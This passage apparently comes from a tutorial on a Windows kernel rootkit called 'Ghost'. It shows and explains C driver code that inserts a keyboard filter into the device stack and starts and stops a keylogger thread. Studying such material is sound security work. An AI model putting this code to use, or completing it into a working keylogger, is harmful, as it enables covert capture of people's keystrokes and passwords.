Ghost.c

One include and three global variables were added to Ghost.c:

  #include "keyManager.h" KEYBOARD_STRUCT keyboardData = {0}; PDEVICE_OBJECT oldKeyboardDevice = NULL; PDEVICE_OBJECT newKeyboardDevice = NULL; 

The global variable keyboardData is a state machine data structure for key processing. The global variables oldKeyboardDevice and newKeyboardDevice are for device stack insertion.

Five lines were added to the OnUnload function:

  if( newKeyboardDevice )  {          removeFilter( &oldKeyboardDevice, &newKeyboardDevice );          StopKeylogger();  } 

The preceding lines enable the keyboard device filter to be unloaded and the keyboard logger thread to be stopped.

The following lines insert the keyboard filter, which also starts the logging thread. GUID_DEVINTERFACE_KEYBOARD is used to ask the operating system for the name of the keyboard device. If IoGetDevice Interfaces returns successfully, the first entry in SymbolicLinkList is used as the keyboard device name:

  Eleven lines were added to the DriverEntry function:PWSTR SymbolicLinkList; if( NT_SUCCESS( IoGetDeviceInterfaces( &GUID_DEVINTERFACE_KEYBOARD, NULL, 0, &SymbolicLinkList ) ) )  {   if( !NT_SUCCESS( insertKeyboardFilter( pDriverObject,    &oldKeyboardDevice,    &newKeyboardDevice,    SymbolicLinkList) ) )    DbgPrint("comint32: Could not insert keyboard filter");   ExFreePool( SymbolicLinkList );  }